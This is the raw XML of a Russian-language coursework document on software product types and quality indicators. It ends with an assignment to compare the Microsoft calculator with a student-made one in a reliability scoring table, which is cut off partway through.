        </w:rPr>
        <w:t>программные продукты (изделия).</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i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Утилитарные программы </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(«программы для себя») предназначены для удовлетворения нужд их разработчиков. Чаще всего утилитарные программы выполняют роль сервиса в технологии обработки данных либо являются программами решения функциональных задач, не предназначенных для широкого распространения.</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i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Программные продукты (изделия) </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>предназначены для удовлетворения потребностей пользователей, широкого распространения и продажи.</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Существуют и другие варианты легального распространения программных продуктов:</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freeware – бесплатные программы, свободно распространяемые, поддерживаются самим пользователем, который правомочен вносить в них необходимые изменения;</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shareware – некоммерческие (условно-бесплатные) программы, которые могут использоваться, как правило, бесплатно.</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lastRenderedPageBreak/>
        <w:t>Ряд производителей использует ОЕМ - программы (Original Equipment Manufacturer), т.е. встроенные программы, устанавливаемые на компьютеры или поставляемые вместе с вычислительной техникой.</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Программные продукты (ПП) могут создаваться как:</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индивидуальная разработка под заказ;</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разработка для массового распространения среди пользователей.</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Основными характеристиками программ являются:</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алгоритмическая сложность (логика алгоритмов обработки информации);</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состав и глубина проработки реализованных функций обработки;</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полнота и системность функций обработки;</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объем файлов программ;</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требования к операционной системе и техническим средствам обработки со стороны программного средства;</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объем дисковой памяти;</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размер оперативной памяти для запуска программ;</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тип процессора;</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версия операционной системы;</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наличие вычислительной сети и др.</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Программные продукты имеют многообразие показателей качества, которые отражают различные аспекты.</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Основная характеристика программного продукта – это его общая полезность, которая включает в себя мобильность, исходную полезность и удобство эксплуатации.</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Мобильность ПП означает их независимость от технического комплекса системы обработки данных, операционной среды, сетевой технологии обработки данных, специфики предметной области и т.п. Мобильный (многоплатфорный) программный продукт может быть установлен на различных моделях компьютеров и операционных систем, без ограничений на его эксплуатацию в условиях вычислительной сети. Функции обработки такого программного продукта для массового использования без каких-либо изменений.</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Исходная полезность характеризуется следующими показателями:</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надежность;</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эффективность;</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учет человеческого фактора;</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i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Надежность работы ПП </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>определяется бессбойностью и устойчивостью в работе программ, точностью выполнения предписанных функций обработки, возможностью диагностики возникающих в процессе работы программ ошибок.</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i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Эффективность ПП </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>оценивается как с позиций прямого его назначения – требований пользователя, так и сточки зрения расхода вычислительных ресурсов, необходимых для его эксплуатации. Расход вычислительных ресурсов оценивается через объем внешней памяти для размещения программ и объем оперативной памяти для запуска программ.</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Учет человеческого фактора означает обеспечение дружественного интерфейса для работы конечного пользователя, наличие котекстно- зависимой подсказки или обучающей системы в составе программного средства, хорошей документации для освоения и использования, заложенных в программном средстве функциональных возможностей, анализ и диагностику возникших ошибок и др.</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Удобство эксплуатации включает следующие показатели качества:</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модифицируемость;</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коммуникативность.</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i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Модифицируемость ПП </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>означает способность к внесению изменений, например, расширение функций обработки, переход на другую техническую базу обработки и т.п.</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i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Коммуникативность ПП </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>основана на максимально возможной их интеграции с другими программами, обеспечении обмене данными в общих форматах представления (экспорт/импорт баз данных, внедрение или связывание объектов обработки и др.).</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xml:space="preserve">Естественно, что в условиях существования рынка программных продуктов важными характеристиками являются: стоимость; количество продаж; длительность продаж (время </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>нахождения на рынке); известность фирмы-разработчика и программы; наличие программных продуктов аналогического назначения.</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Для оценки качества программного средства (ПС) используются различные способы получения информации о нем:</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измерительный – основан на получении информации о свойствах и характеристиках ПС с использованием инструментальных средств (например, объем ПС);</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регистрационный – получение информации во время испытаний или функционирования ПС, когда регистрируется и подсчитываются определенные события (число сбоев и отказов и др.);</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органолептический – анализ восприятия органов чувств, служащий для определения таких показателей как удобство применения ПС, его эффективность и др.;</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расчетный – на ранних этапах разработки применятся теоретические и эмпирические зависимости, статистические данные, накапливаемые при испытаниях, эксплуатации и сопровождении ПС;</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экспертный - рекомендован к применению при определении показателей наглядности, полноты и доступности программной документации, легкости освоения, структурности;</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 социологические – основаны на обработке специальных анкет-вопросников.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776B59" w:rsidRPr="00617AC0" w:rsidRDefault="00776B59" w:rsidP="00776B59">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Качество ПС определяется путем сравнения полученных расчетных значений показателей с соответствующими базовыми значениями показателей существующего аналога или расчетного ПС, принимаемого за эталонный образец.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B080D" w:rsidRPr="00617AC0" w:rsidRDefault="00776B59" w:rsidP="00776B59">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Значения базовых показателей ПС должны соответствовать значениям показателей, отражающих современный уровень качества и прогнозируемый мирровый уровень. В качестве аналогов выбираются реально существующие ПС того же функционального значения, что и сравниваемое, с такими же основными параметрами, подобной структуры и применяемые в тех же условиях эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776B59" w:rsidRPr="00617AC0" w:rsidRDefault="00776B59" w:rsidP="00776B59">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776B59" w:rsidRPr="00617AC0" w:rsidRDefault="00776B59" w:rsidP="00776B59">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Скачать калькулятор любого производителя или взять разработанный студентами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B080D" w:rsidRPr="00617AC0" w:rsidRDefault="00776B59" w:rsidP="00776B59">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Сравнить два программных продукта: калькулятор фирмы Microsoft и калькулятор,</w:t>
      </w:r>
      <w:r w:rsidR="00F46069" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>написанный студентами (скачанный). Сравнение проводить по следующим оценочным элементам:</w:t>
      </w:r>
      <w:r w:rsidR="00F46069" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>надежность ПС, сопровождаемость, корректность. Критерии оценки (1 или 0)</w:t>
      </w:r>
      <w:r w:rsidR="00F46069" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F46069" w:rsidRPr="00617AC0" w:rsidRDefault="00F46069" w:rsidP="00776B59">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Результаты свести в таблицу.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="9656" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1144"/>
        <w:gridCol w:w="3799"/>
        <w:gridCol w:w="1476"/>
        <w:gridCol w:w="1650"/>
        <w:gridCol w:w="1587"/>
      </w:tblGrid>
      <w:tr w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="0012083F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Код элемента</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наименование</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Метод оценки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="0012083F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Оценка калькулятора фирмы Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="0012083F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Оценка калькулятора</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E46CB2" w:rsidRPr="00617AC0" w:rsidTr="00E46CB2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9656" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
          </w:tcPr>
          <w:p w:rsidR="00E46CB2" w:rsidRPr="00617AC0" w:rsidRDefault="00E46CB2" w:rsidP="00E46CB2">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Оценочные элементы фактора «Надежность ПС»</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="00E46CB2" w:rsidP="00E46CB2">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие требований к программе по устойчивости функционирования при наличии ошибок во входных данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Экспертный</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00732FB8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Возможность обработки ошибочных ситуаций</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00732FB8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Полнота обработки ошибочных данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00732FB8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие тестов для проверки допустимых значений входных данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00732FB8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие системы контроля полноты входных данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012083F" w:rsidRPr="00617AC0" w:rsidRDefault="0012083F" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
